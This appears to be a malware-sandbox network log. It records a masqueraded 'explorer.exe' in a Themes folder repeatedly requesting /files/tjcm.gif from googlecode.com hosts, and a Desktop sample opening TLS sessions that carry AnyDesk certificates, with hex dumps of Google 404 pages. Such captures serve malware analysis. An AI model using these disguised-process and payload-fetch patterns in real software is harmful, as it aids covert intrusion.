                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:31.428608894 CEST2767INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                36192.168.2.549899142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:35.080053091 CEST9381OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:35.122745991 CEST9382INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:35 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:35.122762918 CEST9382INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                37192.168.2.549901142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:39.042984962 CEST9390OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:39.070574999 CEST9391INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:39 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:39.070605040 CEST9392INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                4192.168.2.54981049.12.130.23680C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:27.582989931 CEST1838OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 a4 98 88 a3 62 4e f7 e1 db a4 e6 f9 be 7a 64 23 52 85 89 73 8a 41 e7 fd b6 b2 6e c0 d5 b9 4f c3 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                Data Ascii: bNzd#RsAnOn0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                Jul 16, 2022 23:57:27.611453056 CEST1849INData Raw: 16 03 03 00 57 02 00 00 53 03 03 62 d3 34 47 99 c4 80 a7 3f c8 48 7e 47 f2 0c 1c f5 1b 57 61 9e 3b 4f 3a 44 4f 57 4e 47 52 44 01 20 2f e7 45 4d e6 4e 7d 85 1d ba ef bb 0a 31 d0 b0 0d d3 75 21 78 0e 25 97 07 6d f5 79 f9 19 4a 4e c0 2c 00 00 0b ff
                                                                                                                                                                                Data Ascii: WSb4G?H~GWa;O:DOWNGRD /EMN}1u!x%myJN,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                Jul 16, 2022 23:57:27.611495018 CEST1851INData Raw: e0 cd 68 3b 6a 87 6c a6 0d e7 d8 bd 61 df 56 6b 2a e1 1c 2b f5 9f bf 85 dd 8c 5b 06 1e 71 7f ba 4a a6 40 b0 77 17 ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63 86 83 ac 70 84 75 27 2d 35 3d 7b 7b a8 ce
                                                                                                                                                                                Data Ascii: h;jlaVk*+[qJ@w,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_eCL/3
                                                                                                                                                                                Jul 16, 2022 23:57:27.631666899 CEST1852OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 32 30 37 31 37 30 36 35 37
                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 220717065706Z20720704065706Z010UAnyDesk Client0"0*H0uaq4_8[_|_,zN+i/q)NU*E:uFQ[Z+
                                                                                                                                                                                Jul 16, 2022 23:57:27.659316063 CEST1852INData Raw: 15 03 03 00 02 02 2d
                                                                                                                                                                                Data Ascii: -


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                5192.168.2.549820142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:29.528261900 CEST1981OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:29.558214903 CEST1984INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:29 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
